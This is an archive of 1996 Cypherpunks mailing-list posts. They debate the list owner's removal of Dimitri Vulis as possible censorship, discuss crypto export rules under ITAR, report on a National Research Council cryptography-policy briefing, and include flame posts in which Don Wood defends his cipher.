6. In English colleges and universities, an official appointed to keep the
register of all who attend, to mark those who are absent each day on meeting,
to report faults, etc.

7. in psychoanalysis, censorship.

(I guess the Internet falls under 'etc'.) I don't see working for the state
as part of the definition, except for #1, nor the prior restraint.

If I may adduce a recent example from New York City: ABC owns a radio station,
appropriately called WABC. It used to have a collection of popular talk radio
hosts. _Weeks after Disney bought ABC, it fired two (that I know of)
contraversial hosts that were not compatible with Disney's family-oriented
image: Alan Derschowitz (a liberal Harvard law school professor) and Bill Grant
(a right-winger, who immediately got a job with WOR, a New Jersey station).

Certainly Disney owned WABC and was within its rights to censor it. Likewise
John Gilmore is within his rights to destroy his own credibility and to expose
his own hypocricy. It's really a pity, since I used to respect him.

As to B, nowhere is censorship limited to prior restraint. This fallacy
reminds me of the old political joke: Any Chinaman is free to demonstrate on
Tiananmen Square and shout "Fuck Mao", but he may not remain free afterwards.

P.S. Thanks, Bill, for spelling my name correctly.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cypher@cyberstation.net
Date: Mon, 4 Nov 1996 20:09:52 -0800 (PST)
To: Bill Frantz <frantz@netcom.com>
Subject: Re: "Montgolfiering" mindlessness
In-Reply-To: <199611010131.RAA19080@netcom6.netcom.com>
Message-ID: <Pine.BSI.3.95.961104220714.1737A-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 31 Oct 1996, Bill Frantz wrote:

> At  2:18 AM 10/31/96 -0600, cypher@cyberstation.net wrote:
> >Talk the talk |= Walk the walk`
> >
> >If we could bottle up all the hot air espoused by fools like you, we
> >could solve the worldwide energy crisis. Obviously, you are not interested
> >in the facts. You engage in baneful contravallation of jabberwocky since
> >you, and the others so predisposed, are totally clueless with regard to
> >how to break the algorithm.0
> >
> >Now let us hear your plaintive wail of the lame brain excuse about
> >not wanting to waste your time, always the indicant of intellectual pap
> >and intellectual cowardice/dishonesty by super mouthers like you. I may be
> >mindless, but obviously you and Mr. Franz are  brainless, or otherwise you
> >would try to prove something instead of beating off your brains and mouth
> >about it. As with Perry, and  others your information content is:
> 
> Quite a flame.  And just because I said I liked the spoof of Don Woods'
> style too.  (N.B. The slightly different version of the above that was
> privately forwarded to me spelled my name correctly, both in the text and
> the address.)
> 
Yes, I misspelled your name and that is why I sent the separate copy
to you. I apologize for misspelling your name.

Kindest regards,

Don Wood> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 4 Nov 1996 22:15:36 -0800 (PST)
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Censorship on cypherpunks [RANT]
In-Reply-To: <Pine.3.89.9611041122.A16513-0100000@netcom9>
Message-ID: <327EDB5A.7DDF@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:
> On Mon, 4 Nov 1996, Dale Thorn wrote:
> [Quoting Adam]
> > > This has been taken far too seriously.  Cypherpunks is a *PRIVATE* list.
> > > There is no obligation to accept anyone.
> > Isn't this the same argument used by the state whenever they want to differentiate
> > between your "rights" and your "privileges"?  Can they reject one of your privileges
> > whenever they want to, at their discretion?  No.

> Government != private. Why is this so difficult to understand?[snip]
> "It" does not decide. "He" does. John Gilmore is the list *owner*. He can
> decide to remove anyboy from this list. Anytime. For any reason or no
> reason at all. He can even shut down the entire mailing list anytime he
> pleases, for any reason or no reason at all.

I've been looking up some of the words tossed around in this thread, in a dictionary
and elsewhere, to see if I can understand you.  It still sounds to me as though you
believe totally in authoritarian systems.  I don't consider myself a Socialist, but
I believe that some of the well=known concepts of ownership (the U.S. Constitution
has some of these) have both a popular meaning and a hidden meaning.

Question:  When you say *owner*, does this mean he runs the list on his own personal
computers, at his home, or at his business which he owns himself, or could it
mean that he's functioning on behalf of an educational institution and the term
*owner* has a different meaning than what most people would assume?

Maybe I shouldn't ask this kind of question, out of fear or something like that.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cypher@cyberstation.net
Date: Mon, 4 Nov 1996 20:18:09 -0800 (PST)
To: Anonymous <nobody@replay.com>
Subject: Re: Montgolfiering Spoof
In-Reply-To: <199611010919.KAA04730@basement.replay.com>
Message-ID: <Pine.BSI.3.95.961104221209.1737B-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 1 Nov 1996, Anonymous wrote:

> 
> At 10:47 AM -0500 10/31/96, Rabid Wombat wrote:
> >On Wed, 30 Oct 1996, Bill Frantz wrote:
> >
> >> Gee, I put that post in the same place I carefully keep my back issues of
> >> the Cypherpunks Enquirer.
> >> 
> >
> >Bill, you must be humor-impaired. That piece was a great send-up of 
> >Woods. I was laughing 'til tears spilled down an shorted out my keyboard. 
> >I dunno who posted that, but I'm in awe.
> 
> Thanks.
> 
> I know the author rather well, and he assures me he dashed off this
> satirical piece in about as much time as he takes to write his normal
> articles. He tells me that once he had "grokked" the inimitable (not) style
> of Don Wood, it was easy to write a screed that echoed Wood's wackiness.
> 
> Of course, for people who read satire on this list, the initials at the end
> are a clue. But don't publish who you think it is, as KVFP doesn't want a
> lawsuit from Wood for hurting Wood's feelings.
> 
> --KVFP
> 
That person is not about to get a lawsuit from me about anything. I
have more important things to do with my time. I enjoyed it very much
myself and had a good laugh too. Please keep it up, you are good at it.

Kindest regards, 

Don Wood

> -- > 
> 
> --
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Mon, 4 Nov 1996 14:22:32 -0800 (PST)
To: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Subject: Re: British Telecom merger with MCI
In-Reply-To: <199611041159.GAA21112@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <Pine.LNX.3.94.961104222007.1427B-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 Nov 1996, Peter D. Junger wrote:

> 
> Has anyone figured out how this merger can work, particularly when
> British Telecom will be the surviving party, when those MCI employees
> concerned with the security of communications will not be able to
> disclose any cryptographic software or technical data to their
> employer, or to their ``foreign'' bosses and colleagues, without first
> getting permission from the Office of Defense Trade Controls under
> the ITAR?
> 

Crypto developed within a company can be revealed to other parts of the
company, and GB is an ally of the US -- Nobody's going to say anything
when they _do_ "violate" the ITAR

 --Deviant
The world is not octal despite DEC.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cypher@cyberstation.net
Date: Mon, 4 Nov 1996 20:23:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Montgolfiering Spoof
In-Reply-To: <199611010919.KAA04730@basement.replay.com>
Message-ID: <Pine.BSI.3.95.961104221833.2559A-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 1 Nov 1996, Anonymous wrote:

> 
> At 10:47 AM -0500 10/31/96, Rabid Wombat wrote:
> >On Wed, 30 Oct 1996, Bill Frantz wrote:
> >
> >> Gee, I put that post in the same place I carefully keep my back issues of
> >> the Cypherpunks Enquirer.
> >> 
> >
> >Bill, you must be humor-impaired. That piece was a great send-up of 
> >Woods. I was laughing 'til tears spilled down an shorted out my keyboard. 
> >I dunno who posted that, but I'm in awe.
> 
> Thanks.
> 
> I know the author rather well, and he assures me he dashed off this
> satirical piece in about as much time as he takes to write his normal
> articles. He tells me that once he had "grokked" the inimitable (not) style
> of Don Wood, it was easy to write a screed that echoed Wood's wackiness.
> 
> Of course, for people who read satire on this list, the initials at the end
> are a clue. But don't publish who you think it is, as KVFP doesn't want a
> lawsuit from Wood for hurting Wood's feelings.
> 
> --KVFP
> 
I do not intend to bring any lawsuit about any spoof. I have more
important things to do with my time. I enjoyed it too  and had some good
laughs. Keep it up, it helps us to keep everything in perspective,

Kindest regards,

Don Wood 

> --
> 
> 
> --
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 4 Nov 1996 19:31:09 -0800 (PST)
To: ses@tipper.oit.unc.edu (Simon Spero)
Subject: Re: British Telecom merger with MCI
In-Reply-To: <Pine.WNT.3.95.961104152209.-1035279A-100000@hilly.oit.unc.edu>
Message-ID: <199611050326.WAA14085@homeport.org>
MIME-Version: 1.0
Content-Type: text


Simon Spero wrote:

| On Mon, 4 Nov 1996, Peter D. Junger wrote:
| > Has anyone figured out how this merger can work, particularly when
| > British Telecom will be the surviving party, when those MCI employees
| > concerned with the security of communications will not be able to
| > disclose any cryptographic software or technical data to their
| 
| It's reasonably  trivial to get export licences from both countries 
| for foreign subsidiaries. Also, British Telecom and GCHQ have a 
| friendly working relationship, and any merger is unlikely to change
| these facts.

Phil Karn failed to get an export license for 3des for foriegn offices
of Qualcomm, staffed by Americans.  See
www.eff.org/pub/Crypto/ITAR_export/nsa_3des_export_denial_0396.letter 

Adam


-- 
Celebrate Guy Fawkes day.  Send a revolutionary to Congress.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Mon, 4 Nov 1996 22:37:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [NOISE] Censorship of Dr. Vulius
Message-ID: <2.2.32.19961105063515.006c9fa4@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:00 AM 11/4/96 -0500, you wrote:
>someone abuses that priveledge they may lose it. Plain and simple.  It is
>also worthy to note that the Right to Free Speech, etc. applies to the
>government (IOW, the government can not hinder the right to free speech so
>long as that speech does not infringe upon someone else's right.  Since when
>is this list government run?  The decision was apparently a personal one.

I don't think anyone has argued that the owner of the list doesn't have the
right to remove people from it.  However, simply because he has the right to
doesn't mean he should, and it also doesn't mean other members can't or
shouldn't argue that he made a bad decision (unless, of course, the dissenting
members are removed as well.)  Many, if not most, members believe the list
should be run in a non-authoritarian manner (whoever argued that the term
authoritarian applies only to governments is wrong.  the difference is a person
has the right to act in an authoritarian manner over his own property whereas
a government doesn't have that right over it's citizens.  Again, however,
having 
the right doesn't necessarily make it "okay").  
//cerridwyn//





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 4 Nov 1996 22:43:36 -0800 (PST)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: FW: Dr. Vulis is not on cypherpunks any more [RANT]
In-Reply-To: <Pine.SUN.3.91.961104121108.122E-100000@crl.crl.com>
Message-ID: <327EE192.7D6B@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort wrote:
> On Mon, 4 Nov 1996, Dale Thorn wrote:
> > Am I missing something, or do some people just not get it?

> Yes, Dale is missing something, not the other way around.[snip]
> Would Dale be so tolerant if Dimitri were loudly using abusive
> language towards Dale's mother and others in her own livingroom?
> Would he accuse her of censorship if she asked Dimitri to leave?
> What would he say if she kicked Dimitri out?  Enquiring minds want to know.

A more practical and realistic example might be if Dale was living in an apartment,
and Dale's mother walked out to the garage to get into her car, and the next-door
neighbor started calling her the most vile and foul things (but no direct threats
of harm or whatever), and Dale called the Police, and the Police said "there's
absolutely nothing we can do, and further, if you should happen to get into a
scuffle with the neighbor defending your poor old mother, even if the neighbor
starts the fight, we will arrest you and take you to jail", ad nauseam.

When asked directly what the male police officers would do if someone tried that on
their mother or wife, they would be evasive and non-committal, because, as you see,
they have to defend themselves first before they can defend you, the paying client.

This is far more realistic than your example, since the immediate neighborhoods where
these situations develop are a better model for cypherpunks than the inside of one
individual's home.  Other models I can think of might be a free-speech forum such as
a radio talk show, with rather strict guidelines due to the FCC or the host station,
or (less likely) a continuous, never-ending party hosted at an individual's home,
where that individual can exercise total autocracy in throwing someone out.

I could probably do better with this, or even leave it alone, if the arguments were
more rational and less of "I feel this is wrong....it just feels wrong", etc.

Your questions above didn't really say anything I can respond to better than this.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 4 Nov 1996 22:08:50 -0800 (PST)
To: paul@fatmans.demon.co.uk
Subject: Re: Dr. Vulis is not on cypherpunks any more
In-Reply-To: <847122169.8850.0@fatmans.demon.co.uk>
Message-ID: <199611050557.XAA06903@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


paul@fatmans.demon.co.uk wrote:
> > Well put!  I tired a long time ago of Dr. Vulis and several others on this
> > list.  Rather than bitch about it or resort to the same big brother
> > gestapo-censor bullshit we profess to abhor I simply utilized the extensive
> > filtering capability of Eudora.
> > 
> > I don't need "big brother" or big "cypherpunk" censoring my mail for me.
> > We have become what we fear the most.  How prophetic and pathetic.
> 
> John, if you, and those who support your actions, claim to be 
> libertarians you need to take a good hard look at what you have done.
> 
> This is a distinctly "big cypherpunkish" move and really cannot be 
> condoned even bearing in mind the inane and wearisome behaviour of 
> Dr. Vulis.

I guess libertarian philosophy permits operating a private mailing
list and imposing whatever rules the host deems necessary to invent.

The question is, can this ist be called a free medium for exchange of
ideas, or not. My answer is no.

Moderated forums might create some utility (by saving the time of their
participants, for example), but they should identify themselves as such.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Mon, 4 Nov 1996 20:58:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Dr. Vulis
In-Reply-To: <55k974$ot4@life.ai.mit.edu>
Message-ID: <327ECAC8.2781@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Bill Frantz wrote:
> 
> As I put on my flame resistant suit...
> 
> IMHO, most of the posts about John Gilmore's action re: Dr. Vulis are
> seriously miss-analyzing what has happened.  As far as I can tell, John
> instructed his Majordomo to refuse subscription requests to cypherpunks
> from Dr. Vulis.  That is all that John has done.  What John has not done
> is:

Of course John was right to give Vilus the boot. Cypherpunks is a club
and like many private clubs occasionaly finds it necessary to give some
oik the boot.

And of course this is not an action that can be strictly justified in
terms of absolute rights which many are fond of prating on about. Rights
are limited, as Mills observes they are a product of law. Society finds
it necessary to enact laws to protect rights. Dmitri's posts were
affecting other people's right to speak. There is thus the traditional
liberal conflict, that of having to infringe rights to protect them.
If libertarians would read "on Liberty" rather than using it like
a magic charm they would know that the main theory it advances is of
the *balance* between the rights of communities and the rights of
individuals. 

The genius of Mills is that he shows that the "rights" of government
stem from its duty to protect the "rights" of the citizens.

Its an imperfect answer because the notiopn of "citizenship" it advances
fails to take any account of foreign relations. Mill's rationale for 
obeying laws breaks down when one crosses national borders for example.

> The best paradigm I can come up with to analyze John's action is my quite
> imperfect understanding of communitarian theory.  In essence,
> communitarians say that there should be a level of social control between
> individual rights and the forceful coercion of the state.  What John has
> done is step forward and excommunicate Dr. Vulis.  He has said to Dr.
> Vulis, "You are no longer a member of the cypherpunks community."

Rather than "should", try the word "is". One of the things the Web 
demonstrates is that there are such communities. I would not state the
action in terms of "excommunication", rather consider that John took
the action on behalf of the community for the good of the community as a 
whole.

> I would love to hear how people feel this action fits in to the
> cryptoanarchy, libertarian utopias we frequently discuss.  E.g. Why is it
> not a perfectly reasonable action for some one to take in an anarchy?

If we could get away from the bleating denials of the need for
government
and instead consider them as a positive force, preventing a power vacum
that 
others would fill a synthesis can be reached. The founders of the
US realised that to pervent tyranny it was necessary to have different 
branches and levels of government. The essential point being however to
prevent power being used.

When a community of people get together they can exercise far more power
than individuals acting alone. Sometimes this power can be for the
common
good, other times it can be the sectarian persuit of one minorities 
interests against another. 



	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Hayes <dave@kachina.jetcafe.org>
Date: Tue, 5 Nov 1996 00:36:42 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: Censorship on cypherpunks
Message-ID: <199611050806.AAA00731@kachina.jetcafe.org>
MIME-Version: 1.0
Content-Type: text/plain


Dimitri "Too Hot for Cypherpunks" Vulis writes:
> Does saying "The list owner should not kick people off the list for speech"
> violate the list owner's right to free speech? That depends on whether plug-
> pulling (and mailbombing and ping-storming and other obnoxious behavior)
> is speech.

The entire, highly recursive question of free speech versus censorship
relies almost entirely on the assumption that human beings can be
controlled.

The observation that certain behavior is obnoxious arises from an
inability to control one's own environment at a basic level.  Issues
such as this have nothing to do with mailing lists or net.protocol,
except as vehicles of expression for human conditioning which is
already present.

Until the fly can be tolerated, removing the shit will only serve
to turn one's attention to a new annoyance. 
------
Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet

In a dark alley, a pickpocket tried to snatch Nasrudin's purse. There was a
violent struggle, but eventually Nasrudin got the thief pinned on the ground.
At this moment, a charitable woman passing called out: "You bully, let the
little man up and give him a chance!"
"Madam," panted Nasrudin, "you ignore the trouble which I have had getting
him down."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Decius <decius@r42h17.res.gatech.edu>
Date: Mon, 4 Nov 1996 23:55:03 -0800 (PST)
To: 2600@r42h17.res.gatech.edu
Subject: NRC crypto breifing
Message-ID: <199611050517.AAA01458@r42h17.res.gatech.edu>
MIME-Version: 1.0
Content-Type: text



      "Did the NRC discuss the State Department's GROSS FAILURE to
      prosecute Phil Zimmermann? (PGP) is military strength, and it's
      out there!"  -- Audience member at NRC crypto briefing


  Dr. Herb Lin <hlin@nas.edu> of the National Research Council's
Computer Science and Tecommunications Board gave a briefing this afternoon
to address the Council's recent report, Cryptography's Role in Securing
the Information Society. The briefing was sponsored by the Georgia 
Institute of Technology in Atlanta. 
  One of the most striking aspects of the briefing was the diversity
of perspectives on the issue. Most of our discussions on cryptography have
been with people in the cypherpunk community; this was the first time we
had ever come face to face with people on the other side of the fence. It
is quite obvious that there is much emotional intensity here and we do not
feel that this issue is going to go away soon. However, the NRC seems to
be a voice of reason. 
  We are faced a policy problem: the developing information society is
vulnerable to security threats. Cryptography can be a powerful tool to
thwart these threats, but it is also a dangerous weapon in the hands 
of criminals. 
  As a result of concentration on the above issues, the cryptography
debate has often been framed as a conflict between privacy rights and law
enforcement. The NRC feels that the current policy on cryptography 
discourages its use by the private sector. Lin states that cryptography is a 
very valuable tool for crime prevention and thus benefits Law Enforcement. 
Policy makers should promote cryptography because it can help legitimate 
businesses better secure themselves against would-be attackers. However, 
cryptography also assists criminals in circumventing surveillance. So there 
are both positive and negative impacts for Law Enforcement, but Dr. Lin 
notes an important statement made in the NRC report:

 "The benefits of the widespread use of cryptography 
         far outweigh the risks."  

  Dr. Lin and the NRC believe that there will be an explosion of
interest in computer security in the coming years, and that government
should provide guidance and technical input, both to industry and law
enforcement. The upcoming debate can (and should) be carried out on an
unclassified basis. He said that open standards should be promoted in an
effort to reach consensus between government and industry interests.
Interested parties should be encouraged to study and understand the
algorithms employed by their cryptosystems so that market forces may drive
crypto policy to that which best fulfills the needs of US industry. NRC
promotes the growth and leadership in the private sector and encourages
all organizations to invest in information security. In addition, the NRC 
supports the use of link-level encryption in public networks, especially 
the cellular network. In this mode, LEOs can still access plaintext, but 
it is much more difficult for unauthorized listeners to get it. It should 
be noted that Cryptography is just one part of a comprehensive information 
security program.  While it is useful to prevent eavesdropping, provide user 
authentication, and ensure data integrity, it is not particularly
effective in overcoming the problems of insecure operating systems,
and corruptible employees. 
  One of the more controversial points in the report is the recommendation
for domestic cryptography policy. The NRC recommends that no
restrictions be placed on the use of domestic cryptography, and that the
market should be allowed to choose the best systems. This was met with
incredulty by many members of the audience, particularly those
representing the government. They seemed to feel that "the people"
should not be allowed to make this decision and that many important
aspects of cryptography policy are not necessarily reflected in market
interests. While NRC recognizes Law Enforcement's growing problem in
adapting to new technologies, Dr. Lin said that the FBI could provide
not one example of a class three wiretap that had been thwarted by means
of encryption. Access to encrypted files seemed to be a bigger issue for
LEOs. This takes us naturally to the topic of key escrow. 
  NRC cautions that key escrow is an unproven technology. Of
particular concern is the integrity of escrow agents: how it is to be
evaluated, and what level of integrity is sufficient in any particular
instance? Who is liable if keys are incorrectly disclosed? What are the
liability issues if the key escrow system fails to provide LEOs with
access? There just isn't enough information at this time to make these 
judgments. Many audience members commented that the administration had
rushed into key escrow without forethought or open discourse. The NRC
discourages the hurried passage of new legislation without clear, thorough
discussion of the issues involved by those who will be most directly
affected by the law. Furthermore, any government supported cryptography
system must provide additional value to the end users. The Clipper system
does not do this. Dr. Lin mentioned that data recovery might be of
significant value to most users. If encryption systems are too strong then
users will have a bigger problem with lost keys than they ever had with
stolen intellectual property. The NRC recommends that the US government
act as a test market for key recovery rather than pushing it out to the
public before it is fully developed. 
 The NRC also recommends that Congress consider criminalizing the
criminal use of cryptography. This issue has already been discussed at
length in academic fora, and the general consensus is that this concept is
much easier said than done. We feel that such a policy is not likely to be 
a serious deterrent unless the additional penalty outweighs the benefits of 
secure crypto. It is also worth noting that if crypto is the default in
system people shouldn't be charged with additional crimes for not turning
it off. 
  As for export issues, the NRC recommends that the government allow
export of 56-bit DES without special approval, effective immediately. The
recommendation also suggested that the allowable key length should be
increased over time in order to keep up with improvements in cryptanalysis
and computing power. They feel that export controls should be lessened but
not fully removed. Law Enforcement needs time to develop the skills and
technology necessary to deal with new situations.
  We would take issue with the NRC's assertion that 56 bit DES is
"good enough for most commercial applications," and that algorithms be 
designed to preclude multiple encryption. It certainly depends on the threat 
model involved. DES would be an improvement over plaintext networks, but it 
is certainly not strong enough to defend against industrial espionage 
efforts. We feel that strong cryptography should be exportable now to 
defend against such attacks. We feel that legitimate law enforcement 
interests can get access to the information they require in most cases 
without even having to employ cryptanalysis, especially if systems are 
secured at the link level as the NRC recommends. We would also point to 
the reality that wiretapping is not often used by Law Enforcement, and we 
don't feel that they have justified any increase in it's use. 
  The NRC briefing was very helpful in understanding the meaning of the
report and highlighted many important issues. NRC will have a number of
briefings in major cities all over the US, in hopes that this will spark
more debate over these issues. Attendance at this briefing was much
smaller than we had expected. We would encourage anyone who is
interested in cryptography to attend a future briefing. It is a very good
opportunity to hear and meet people on all sides of this issue. We would
also encourage the cyber-rights crowd to seriously consider the NRC's
recommendations.  It seems to be a realistic look at these issues, and
there is plenty of room here to defend fundamental civil liberties. 


Tom Cross and Jeremy Mineweaser
Electronic Frontiers Georgia




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@tc.umn.edu>
Date: Mon, 4 Nov 1996 22:18:13 -0800 (PST)
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: Censorship on cypherpunks
In-Reply-To: <4JBwwD9w165w@bwalk.dm.com>
Message-ID: <327edc1b1e83002@noc.tc.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dr.Dimitri Vulis KOTM said:
> ichudov@algebra.com (Igor Chudov @ home) writes:
> 
> > Declan McCullagh wrote:
> > >
> > > Libertarianism is not incompatible with strict regulations, as long as
> > > the rules violate nobody's rights.
> >
> > I would appreciate an example of "strict regulations" which do not violate
> > anybody's rights.
> 
> Now that's a good point. The First Amendment says "The Congress shall pass
> no law..." Doesn't that restrict the Congress's rights as a whole, and each
> member's right to vote for bills that violate the Amendment? In GB, they
> _generally frown on any restrictions on what laws the Parliament can pass -
> the adage is "the Parliament's hands shall not be tied".
> 
> Does saying "The list owner should not kick people off the list for speech"
> violate the list owner's right to free speech? That depends on whether plug-
> pulling (and mailbombing and ping-storming and other obnoxious behavior)
> is speech.

Actually, it has nothing to do with speech. Mr. Gilmore owns the machine, and
allows the list to be run from it. At any time he could stop allowing the
list from being distributed from his machine, as would be his right.
If he does not want someone using his resources, it's his right. The fact
that you're the only (someone correct me, was Detwieler also kicked off?)
or one of the only people that has been removed from the list due to
abusive behavior speaks volumes.

As to the cries of censorship and peoples rights being violated, I'd 
contend that rights are not a zero-sum proposition. The minute a person
exercises a right, some other person does not lose a right, or have a 
right violated. What some people would assert is a right (list 
membership) is actually a privilege granted by the owner of the resource.


-- 
Kevin L. Prigge                     | Some mornings, it's just not worth
Systems Software Programmer         | chewing through the leather straps.
Internet Enterprise - OIT           | - Emo Phillips
University of Minnesota             |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cypher@cyberstation.net
Date: Mon, 4 Nov 1996 22:50:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: Q.E.D. - MONTGOLFIERING, SPOOFS +
Message-ID: <Pine.BSI.3.95.961104222712.2559B-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




         I recognize that the vast majority of list readers are
         sensible human beings trying to better the profession they
         love and serve the interests they represent.  As such,
         readers of this thread do not need me, or a claque of
         snivelers, to determine the probity of the impartations being
         made. You are capable of determining that for yourselves.

         This posting is not meant to in any way denigrate your
         important work or to challenge the efforts being made by the
         vast majority of you to be objective, civil, fair and to
         examine the facts and determine the truth to the best of your
         abilities.

         Accordingly, most of the commentary included in this posting
         is directed toward the hallucinating thralldom of a dozen or
         so self proclaimed cryptographic jackadandies who beneath
         their public veneer are simply a flock of flaccid jackanapes.
         As proof of that thesis, look at the transpirations of the
         past few weeks.

         Preamble:

         In law school, potential attorneys are drilled in the three
         prong postulate:

         1. If you can argue the facts, argue the facts, the
            evidence.

         2. If you cannot argue the facts, then argue the law,
            Shannon and Sneider.

         3. If you cannot argue the facts, or the law, then attack
            the opposition, the people presenting the facts.

         Another statement parable is "if you do not like the message
         attack the messenger."

         This stratagem can be applied not only to the courtroom but
         to any affray.

         Evidence:

         1. The cabal of pedants has looked at the IPG web site in
            detail, as evinced by their frequent citing of materials
            that were not theretofore set out in any of the postings
            made to this list. Where did they get it?  Obviously from
            the web site.

         2. They quickly discerned that they could not possibly argue
            the facts as proved by the fact that not a single one of
            them have deigned to do so.  They quickly realized that
            algorithm was unassailable from their extremely limited
            low level of competence.  Actually, it cannot be attacked from
            any level of competence as close analysis of same will reveal.

            I bet none of that eau de vie crowd has ever cracked real
            ciphertext in their life. They live in a self hypnotic fantasy
            mirage world. Obviously, they are incapable of breaking real
            encryption systems. Oh, they have posited all kinds of
            crackbrain scheme for breaking systems under some silly
            hypothetical scenario - most of which have been forseen
            and solved decades ago by people who are real professional
            cryptographers. 

            I could pose a theory of broad jumping from New York to London
            too. All I would have to do is to jump two feet high and be
            traveling at a velocity of roughly 63,360,000 feet per second,
            only about .067 c, and I COULD make it. Some of the
            self presumed cryptographic jackadandies' hairbrain schemes
            are even more obtuse than that. 

         3. Unable to attack the algorithm because of their gross
            impotence, they started citing their law. They attacked my
            position that the stream cipher was an OTP, citing
            Shannon as proof that was not the case. In essence
            invoking the oracular doctrine of Shannon infallibility.
            They skim over Shannon, read Schneier and then get on their
            pulpit and preach their version of the Gospel and to all of us
            mere mortals  because they are totally incapable of solving
            real life applications of cryptography. They spout meaningless
            turkey gobbleddegook instead of actually doing it. As noted
            before,

                 their information = P log_base_infinity P,

             and as is equally evident, 

               their disinformation = P log_base_0 P  

            I acknowledged the truly unique contribution that Shannon
            has made to cryptography, communications and related
            fields and the coessential redound on Schneier for the
            codification of cryptography.  However, my position is
            that Shannon mathematically proved in absolutism only the
            limitations that we must work within, not what can be
            done within those delimiters.

            Accordingly, I argued that the disputation was a matter
            of semantics. I agreed that the algorithm did not have
            infinite entropy but it was still an OTP because it
            fulfilled the other basic tenants of an OTP in all
            respects saving entropy. I further asserted that the
            entropy question was immaterial because the entropy of
            the algorithm was far greater than any possible practical
            need, by tens of thousands of orders of magnitude.  Such
            rationale fell on parti pris deaf erudite ears.

         4. As a result, I realized that from my vantage point such
            an argument was counter productive at the very best.  As a
            result, I took the OTP issue off the table by agreeing,
            as I had stated on numerous occasions, that the algorithm
            produced noncommunicative stream ciphers, PRNG streams
            that manifested remarkable random like properties, though
            they certainly are not random.

         5. Deprived of their dogmatic dictums with respect to IT,
            those detractors, like all disconcerted confuters since
            the dawn of human controversy, turned to the use of
            sophomoric fustigation. They imagine themselves as
            a clique of cryptographic superdupers; but in this
            case they were overwhelmed by the strength of the algorithm,
            which pricked their hyper-inflate egos. That in turn, led to
            their futile efforts to try to strike back and cudgel the
            source of their foil as they vented their acute frustrations.

            In this case, since many of them are obviously very
            bright and articulate, their resultant falderal is very
            adroit and humorous.  Even though being the butt of their
            lampoonery, I nonetheless was highly amused, got some
            good laughs, found it entertaining and was flattered by
            the expended efforts of the author(s).

            Although I recognize that it was not intended to be so, I
            found it to be exemplary raillery. Levity can help all of
            us to keep serious matters in perspective and I applaud
            the authors for their jocose entertainment.  Keep it up,
            not only is it fun, it also helps everyone to see through
            the smoke screens in order to discern the real underlying
            truths.

         6. Note that during the whole discourse and postings made to
            this thread, not a single individual has critiqued
            the algorithm itself. Not many of them will even own up to
            having looked at the algorithm, much less having
            attempted to analyze it and assess its strengths or
            weaknesses.  Get real.  How many readers really believe
            that all of those fast cryptographic guns would ignore the
            real, very simple, algorithm in unison if they stood a ghost 
            of a chance of cracking it? Any talk of a mediocre pecunary
            reward for breaking the algorithm is giddy poppycock and
            everyone knows it. They would much rather have the 
            satisfaction and pride that they were the one that gigged me, 
            the only rub being that that is patently impossible .   

            Each individual in that elitist cabal obviously salivates
            at the opportunity to crack the algorithm and throw it
            back in my face since my postings have raised seemingly
            heretic controversy. It should be clear to all readers of
            this thread, that with a possible exception or two, those
            detractors have looked at the algorithm and realize it
            far exceeds their meager cryptanalytic abilities.
            Accordingly, it is transpicuous that they have resorted to
            trying to use their turkey flapdoodle to cloud the issue since
            they have nothing of substance to reason upon. They could not
            crack their way out of a wet Kleenex with an unlimited
            number of gigaton thermo nuclear weapons. 

            Perry Metzger and others have even used inculcative
            factoids to try to claim that the algorithm had been
